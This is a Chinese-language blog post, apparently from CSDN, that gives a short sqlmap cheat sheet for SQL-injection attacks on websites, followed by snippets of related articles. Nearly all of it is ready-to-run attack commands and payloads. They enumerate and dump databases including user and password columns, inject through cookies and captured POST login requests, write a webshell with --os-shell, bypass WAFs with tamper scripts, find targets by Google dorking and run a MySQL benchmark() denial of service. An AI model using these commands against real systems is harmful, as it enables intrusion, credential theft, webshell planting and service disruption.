sqlmap mysql 登录_sqlmap简单使用

最新推荐文章于 2024-05-14 20:32:45 发布
最新推荐文章于 2024-05-14 20:32:45 发布
阅读量382 收藏
点赞数
文章标签: sqlmap mysql 登录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42523104/article/details/113161504
版权
本文详细介绍了如何使用sqlmap工具进行MySQL和Access数据库的注入攻击,包括检测注入点、爆库、爆表、爆字段等操作,并讲解了如何应对POST登录框注入、绕过WAF防火墙以及利用sqlmap进行DOS攻击和Google搜索目标页面。同时,还提到了sqlmap的tamper模板编写和使用,以实现对过滤规则的绕过。
摘要由CSDN通过智能技术生成

1. MySQL数据库注入

检查注入点(主要看是否能返回消息):sqlmap.py -u url

爆所有库:sqlmap.py -u url -dbs

爆当前库:sqlmap.py -u url --current-db

2.Access数据库注入

判断是否是access数据库:url and exists(select id from MSysAccessObjects)

其他数据库判断语句:

Access: aNd aSc(cHr(97))=97

Access: and exists(select id from MSysAccessObjects)

SQL Server: and exists(select id from sysobjects)

SQL Server: and length(user)>0

MySQL: and length(user())>

access数据库没有库的概念,直接爆表sqlmap.py -u "url" --tables

爆列,爆字段,可以在日志里找到

3. 指定数据库,操作系统

检查是否是注入点

爆库:sqlmap.py -u url --dbms mysql 5.0 --current-db

爆表:sqlmap.py -u url --dbms mysql 5.0 -D cms --tables

爆列:sqlmap.py -u url --dbms mysql 5.0 -D cms -T cms_user --columns

爆字段:sqlmap.py -u url --dbms mysql 5.0 -D cms -T cms_users -C password ,username --dump

4. 请求延时注入

测试注入点:sqlmap.py -u url -p id

sqlmap注入方式techniquesqlmap.py -u url --technique T

B: 基于Boolean的盲注(Boolean based blind)

Q: 内联查询(inlin queries)

T: 基于时间的盲注(time based blind)

U: 联合查询(union query based)

E: 错误(error based)

S: 栈查询(stack queries)

猜数据库sqlmap.py -u url --technique T -time-sec 9 --current-db

其他参数:--delay,--safe-freq

5.常规伪静态注入

伪静态:主要是为了隐藏传递的参数名,伪静态只是一种URL重写的手段,既然能接受参数输入,所以并不能防止注入。目前来看,防止注入的最有效的方法就是使用LINQ。

加星花:sqlmap.py -u "url*.html" --dbs

利用sqlmap注入:sqlmap.py -u "url*.html" --current-db --hex

爆表:sqlmap.py -u "url*.html" -D "cms" --tables –hex

6.cookie注入

burpsuite获得cookie

sqlmap的cookie注入攻击:sqlmap.py -u url --cookie “uname=admin" --level 2

爆库,爆表,爆列,爆字段

7.POST登录框注入

burpsuite抓包右键保存到\Python2\sqlmap中

测试能否注入sqlmap.py -r 1.txt -p user(-r:让sqlmap加载post请求,-p:指定注入用的参数)

爆库 sqlmap.py -r 1.txt --current-db

自动搜索表单:sqlmap.py -u url --form

指定一个参数:sqlmap.py -u url --data "name=1&pass=1"

8.交互式写shell及命令执行

测试注入点:sqlmap.py -u url -p id

利用SQLmap写webshell:sqlmap.py -u url --os-shell 输入脚本语言,输入网站绝对路径

9.绕过WAF防火墙

利用tamper脚本绕过过滤: sqlmap.py -u url --dbs --batch --flush-session --tamper=equaltolike.py,space2comment.py,randomcase.py

10.sqlmap模板使用,编写

尝试注入 and 1=1被拦截

利用%0a尝试绕过,发现可以

编写tamper模板,利用sqlmap跑库(c:\python27\sqlmap\tamper)

利用sqlmap跑库sqlmap.py -u "url" --dbs --batch --tamper=equaltolike.py, space2mssqlhash.py, randomcase.py, space2hassh.py, base64encode.py, charencode.py

11.利用sqlmap来google搜索

查找页面:sqlmap.py -g inurl:php?id=

12.sqlmpa进行Mysql DOS攻击

获得shell:sqlmap.py -u url --sql-shell

进行攻击:select benchmark(9999999999,0*70726f63409284209)

王文璐
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用sqlmap进行需要登录的注入
ChuMeng1999的博客
01-19 4116
目录预备知识了解Sqlmap了解cookie实验目的实验环境实验步骤一利用sqlmap进行Cookie注入实验步骤二 预备知识 了解Sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 了解cookie cookie是由网景公司的前雇员Lou Montulli在1993年3月的发明,由服务
sqlmap使用
li2495735120的博客
06-16 284
首先我们要使用的工具是VMware、centos7、kali-Linux基于工具VMware安装centos7、kali-linux。在centos7中搭建LAMP。接着基于LAMP搭建DVWA的环境。
网络安全最全SQLmap使用教程图文教程(超详细),2024年最新太厉害了
最新发布
2401_84264610的博客
05-14 1610
1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
利用SQLmap实现 SQL 注入
weixin_70934757的博客
06-29 807
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。大家也许都听过某某学长通过攻击学校数据库修改自己成绩的事情,这些学长们一般用的就是SQL注入方法。SQL注入其实就是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说,就是数据「越俎代庖」做了代码才能干的事情。
红队笔记7-CTF4打靶流程-sqlmap注入-ssh远程登录
qq_63442530的博客
03-20 1387
CTF4这个靶场很简单,也是因为是09年的靶场了,sqlmap这种工具也没有诞生。思路:80端口->web->注入点->sqlmap获取账号密码->ssh登录打这个靶场也暴露出来我很多的缺点:1.在对web功能简单分析的过程中,老是被没有用的点浪费时间,对功能是否有利用点,分析的不到位,说到底还是自己的经验不足。2.过于依赖工具。红队笔记大佬还提到,进行渗透测试的过程中,我们不能单纯依赖nmap和sqlmap这种自动化工具,还是要了解漏洞的原理与代码的编写,使用工具表面上方便,但会有很多缺点。
sqlmap mysql 登录_SqlMap简单使用
weixin_35456031的博客
01-30 800
SqlMap简单使用有时候我们得到的 网站后台的登录密码 = 网站服务器的远程桌面服务登录密码 = FTP服务登录密码 (有几率)sql注入 mysql使用综合性扫描软件扫描,在配合手工检测确认注入点,得到注入点后用sqlmap参数选其讲解参数:-rsqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)。比如文本文件内如下:PO...
sqlmapproject-sqlmap-1.4.7-26-g84bc264 (1)_sqlmap_tool_
09-30
SQLMap是一款广泛使用的开源渗透测试工具,专门用于检测和利用SQL注入漏洞。标题中的"sqlmapproject-sqlmap-1.4.7-26-g84bc264 (1)_sqlmap_tool_"表明我们讨论的是SQLMap的一个特定版本,即1.4.7-26-g84bc264。在本...
Sqlmap使用手册中文版
01-13
Sqlmap不仅支持多种数据库管理系统,如MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix,还具备一系列高级功能。比如,它能...
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
2. 全面支持:SQLMap支持多种数据库系统,包括MySQL、PostgreSQL、Oracle、Microsoft SQL Server等。 3. 多种注入技术:它可以执行盲注、时间延迟注入、基于错误的注入等多种类型的SQL注入攻击。 4. 数据库接管:...
SqlMap使用
06-24
### SqlMap使用详解 #### 一、SqlMap简介及工作原理 SqlMap是一款开源的渗透测试工具,用于自动化地检测并利用Web应用程序中的SQL注入漏洞。它支持多种类型的数据库,如MySQL、Oracle、PostgreSQL等,并能进行...
sqlmap_windows版
11-07
在Windows平台上,它通常需要Python环境来运行,但“sqlmap_windows版”提供了一个特别版本,使得用户可以在没有Python环境的情况下直接在Windows系统上执行SQLMap,极大地简化了使用流程。 1. **SQL注入攻击**:...
史上最详细sqlmap入门教程
weixin_44867191的博客
05-16 1万+
最近做安全测试,遇到了SQL盲注的漏洞,从发现漏洞,确认漏洞,协助开发复现漏洞,验证漏洞一整套流程下来,有了亿点点收获,下面分享给大家,希望对软件测试同学有所启发,难度不大,小白看完也能上手的那种。
超详细SQLMap使用攻略及技巧分享
Y525698136的博客
12-26 1492
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。
sqlmap mysql 登录_利用sqlmap进行mysql提权的小方法(win与liunx通用)
weixin_39745269的博客
01-25 126
标签:文章作者:pt007@vip.sina.com文章来源:https://www.t00ls.net/thread-36196-1-1.html1.连接mysql数据打开一个交互shell:sqlmap.py -d mysql://root:root@127.0.0.1:3306/test --sql-shellselect @@version;select @@plugin_dir;d:\\...
SQLmap使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
06-20 4万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
sqlmap对php登录页面,sqlmap登录框注入
weixin_36072221的博客
03-12 882
注入方式一:1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下2.列数据库:sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs注:-r表示加载一个文件,-p指定参数3.猜表选择一个数据库,比如选fendosqlmap.py -r "c:\Users\fendo\Desktop\test.tx...
sqlmap账号密码登录mysql,Sqlmap初体验,渗透拿到网站用户名密码
weixin_30386973的博客
03-27 1130
前期准备:拿到目的网站时,要先停止信息搜集,目的是为了扩展目的范围。能够看一下有哪些“C段”(即同网段不同IP),有哪些二级域名“旁站”(即同效劳器的不同站点),这些都是你不可疏忽的潜在目的。武器:御剑,能够找C段,杀敌于无形。SubDomainsBrute,Layer子域名发掘机,能够找二级域名。御剑也能够扫出网站的后台(之后我们会用到)。接下来,判别可能存在的破绽,这一点客观经历很重要。效劳器...
sqlmap mysql shell
06-11
你想要了解如何使用SQLMap来获取MySQL Shell访问权限吗?如果是的话,我可以为你提供一些基本的指导。 首先,你需要确保已经安装了SQLMap。接下来,你需要找到一个目标网站或应用程序,它使用MySQL数据库,并且...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值